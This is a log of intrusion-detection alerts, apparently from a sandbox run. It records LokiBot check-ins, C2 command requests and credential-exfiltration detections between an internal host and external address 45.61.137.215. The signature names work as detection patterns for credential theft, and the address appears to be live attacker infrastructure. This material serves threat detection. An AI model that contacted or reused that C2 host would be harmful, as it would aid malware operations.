ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:22.325206
SID:	2021641
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:03.530501
SID:	2024318
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:43.048990
SID:	2025381
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:00.355563
SID:	2024318
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:24.001326
SID:	2021641
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:56.560139
SID:	2024318
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:39.786935
SID:	2021641
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:03.962389
SID:	2025381
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:10.745956
SID:	2025381
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:36.928242
SID:	2021641
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:47.110312
SID:	2025381
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:18.886669
SID:	2021641
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:56.560139
SID:	2024313
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:15.260799
SID:	2024318
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:25.799709
SID:	2024318
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:36.285874
SID:	2021641
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:46.431591
SID:	2025381
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:15.260799
SID:	2024313
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:30.532619
SID:	2025381
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:03.962389
SID:	2024318
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:25.799709
SID:	2024313
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:39.786935
SID:	2025381
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:50.434635
SID:	2024313
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:03.962389
SID:	2024313
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:17.236236
SID:	2021641
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:27.150658
SID:	2021641
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:03.530501
SID:	2024313
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:52.721787
SID:	2024313
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:43.048990
SID:	2021641
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:52.721787
SID:	2024318
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:39.996238
SID:	2025381
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:57.173481
SID:	2021641
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:43.233365
SID:	2024317
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:53.733914
SID:	2025381
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:11.339177
SID:	2024313
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:43.233365
SID:	2024312
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:49.622449
SID:	2021641
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:39.996238
SID:	2024312
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:14.011875
SID:	2024318
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:39.996238
SID:	2024317
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:32.900181
SID:	2025381
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:33.749822
SID:	2021641
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:11.339177
SID:	2024318
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:53.733914
SID:	2024313
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:14.011875
SID:	2024313
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:06.757643
SID:	2021641
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:52.721787
SID:	2025381
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:53.733914
SID:	2024318
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:46.431591
SID:	2024318
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:00.654651
SID:	2025381
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:50.434635
SID:	2024318
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:29.494079
SID:	2021641
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:07.384774
SID:	2021641
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:47.110312
SID:	2021641
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:20.207962
SID:	2025381
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:30.532619
SID:	2024318
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:46.431591
SID:	2024313
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:30.532619
SID:	2024313
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:00.654651
SID:	2021641
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:36.928242
SID:	2024313
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:20.207962
SID:	2024313
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:20.207962
SID:	2024318
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:10.745956
SID:	2021641
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:24.001326
SID:	2025381
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:11.339177
SID:	2025381
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:42.997268
SID:	2024313
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:49.622449
SID:	2025381
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:32.900181
SID:	2021641
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:42.997268
SID:	2024318
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:22.325206
SID:	2025381
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:39.745782
SID:	2021641
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:42.997268
SID:	2025381
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:24.001326
SID:	2024318
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:00.355563
SID:	2021641
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:24.001326
SID:	2024313
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:43.233365
SID:	2025381
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:22.325206
SID:	2024313
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:03.530501
SID:	2021641
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:27.150658
SID:	2025381
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:22.325206
SID:	2024318
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:18.886669
SID:	2024313
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:25.799709
SID:	2025381
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:39.786935
SID:	2024313
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:18.886669
SID:	2024318
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:39.786935
SID:	2024318
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:56.560139
SID:	2021641
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:36.928242
SID:	2024318
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:56.560139
SID:	2025381
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:07.384774
SID:	2025381
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:36.285874
SID:	2024318
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:25.799709
SID:	2021641
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:15.260799
SID:	2021641
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:18.886669
SID:	2025381
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:03.962389
SID:	2021641
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:52.721787
SID:	2021641
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:29.494079
SID:	2025381
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:36.285874
SID:	2024313
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:50.434635
SID:	2021641
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:36.928242
SID:	2025381
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:17.236236
SID:	2024318
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:06.757643
SID:	2024318
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:27.150658
SID:	2024313
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:43.048990
SID:	2024318
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:57.173481
SID:	2024313
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:57.173481
SID:	2024318
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:43.048990
SID:	2024313
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:43.233365
SID:	2021641
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:27.150658
SID:	2024318
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:17.236236
SID:	2024313
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:49.622449
SID:	2024313
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:39.996238
SID:	2021641
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:17.236236
SID:	2025381
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:14.011875
SID:	2021641
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:53.733914
SID:	2021641
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:06.757643
SID:	2024313
Source Port:	49719
Destination Port:	80
